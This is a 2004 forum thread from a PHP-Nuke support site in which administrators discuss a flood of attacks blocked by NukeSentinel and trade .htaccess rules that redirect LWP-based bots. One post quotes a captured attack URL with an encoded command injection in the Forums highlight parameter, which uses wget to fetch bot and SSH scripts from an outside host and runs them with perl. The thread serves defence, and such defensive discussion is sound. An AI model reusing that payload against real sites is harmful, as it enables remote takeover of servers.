| Author |
Message |
flatliner
New Member
Joined: Dec 25, 2004
Posts: 2
|
 Posted:
Sat Dec 25, 2004 8:41 am |
|
Man what a Xmas got home from spending time at the InLaws (OMG) as if thats not bad enough I see 30 emails from my website all blocked attempts. Thanks for everything your protection saved me.
|
| |
|
|
|
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
|
| Posted:
Sat Dec 25, 2004 10:28 am |
|
Since about 1:21AM this morning, my site has been hit by 109 different abuse attempts, an all-time high. In fact, in the past 11 hours I've been protected by NukeSentinel more times than the combined history.
They are all various types of lwp::simple attacks.
They range from highlight abuse attempts to XSS abuse attempts, to well.. you name it.
If I didn't know better, I'd swear this was either the activity of a trojan or worm on people's systems.
Anyway, I feel bad for anyone that hasn't upgraded to 2.0.11 because 99% of these attacks are going after my Forums, unlike the above post.
For example:
| Quote: | | Query String: (Edited to mess with the script kiddies) 64bit.us/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlite=%2527.%70%61%73%73%74%68%andonandonandon |
Anyway... I've got a TON of these and others if anyone wants them.. Let's hope the hacks attemps slow down soon! |
_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance. |
|
|
|
|
flatliner
|
| Posted:
Sat Dec 25, 2004 10:49 am |
|
Since my last post I have received another 30 or so attacks. I didnt think i was that popular LOL. What do you have for your blocker strings? are you default or did you add more?
My harvester List is default and mu Request method I added:
Delete
Delete & Trace
HEAD
Trace
String Blocker has no List |
| |
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Sat Dec 25, 2004 10:51 am |
|
|
|
|
|
64bitguy
|
| Posted:
Sat Dec 25, 2004 11:14 am |
|
Thanks Raven, I guess I missed those posts about everyone else getting attacked, but given the scale of the attacks and the VAST number of IP's involved, I'm forced to wonder if this is a worm, virus or what?
At present, I haven't changed my .htaccess because frankly, I've modified my forwarding properties in NukeSentinel so it sends them to a Google adsense ad...  I figure what the heck, if I'm going to get attacked, they might as well pay me for it
If I can figure out the right rewrite condition/rule for htaccess to forward them to an adsense ad (instead of to the php file) I'll mod it accordingly.
Thanks for the info! |
| |
|
|
|
|
Muffin
Client
Joined: Apr 10, 2004
Posts: 649
Location: UK
|
| Posted:
Sat Dec 25, 2004 4:48 pm |
|
Which htaccess file do we have to put this c ode in and where?
| Quote: | RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off |
in my nuke/html folder htaccess I just have a list of banned ip's and in the abuse folder htaccess it just says allow from all
thanks |
_________________
Classic Mini rules the bends & bends the rules!
[img] |
|
|
|
|
Raven
|
| Posted:
Sat Dec 25, 2004 6:02 pm |
|
It goes in your main .htaccess folder. |
| |
|
|
|
|
Muffin
|
| Posted:
Sat Dec 25, 2004 7:00 pm |
|
Thanks Raven
Do I put it in the top of the htaccess file?
All I have in mine at the moment is a list of the ip's that sentinel has banned and nothing else. Thats in the nuke/html/abuse folder.
Or do you mean the main htaccess in my hosting root directory?
Dont ya just love us brainy ones lol |
| |
|
|
|
|
Raven
|
| Posted:
Sat Dec 25, 2004 9:06 pm |
|
Main .htaccess, where config.php is stored. I would put it at the top. |
| |
|
|
|
|
djdiz-e
Regular
Joined: Dec 19, 2004
Posts: 51
Location: Ontario, Canada
|
| Posted:
Sat Dec 25, 2004 10:29 pm |
|
i added this to my .htaccess is this right?
| Quote: | RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off |
|
| |
|
 
|
|
Raven
|
| Posted:
Sat Dec 25, 2004 10:35 pm |
|
Instead ofCode:RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
|
UseCode:RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
|
|
| |
|
|
|
|
djdiz-e
|
| Posted:
Sat Dec 25, 2004 10:43 pm |
|
ah good idea thanks
and another question emailsforyou.php
is that a page that displays to the attacker? |
| |
|
|
|
|
Raven
|
| Posted:
Sat Dec 25, 2004 10:48 pm |
|
No. But it can be whatever you want. |
| |
|
|
|
|
djdiz-e
|
| Posted:
Sat Dec 25, 2004 11:12 pm |
|
i added this to the top of my .htaccess and i still get emails from sentinal saying it blocked ..this normal?
My .htaccess file:
| Quote: | RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off |
E-mail:
|
| |
|
|
|
|
Muffin
|
| Posted:
Sun Dec 26, 2004 5:41 am |
|
Thanks Raven {{{hugs}}}
djdiz-e you need to add this line as well I think
| Quote: | | RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple |
|
| |
|
|
|
|
Raven
|
| Posted:
Sun Dec 26, 2004 8:03 am |
|
| Muffin wrote: | Thanks Raven {{{hugs}}}
djdiz-e you need to add this line as well I think
| Quote: | | RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple |
|
No, you don't need that line. The ^LWP [NC] means any user-agent beginning with LWC, regardless of case. |
| |
|
|
|
|
twinjet
New Member
Joined: Jan 17, 2005
Posts: 22
|
| Posted:
Fri Jan 28, 2005 1:37 am |
|
i was just simple and wanted to let the poster of this the it is makarena not makerel |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
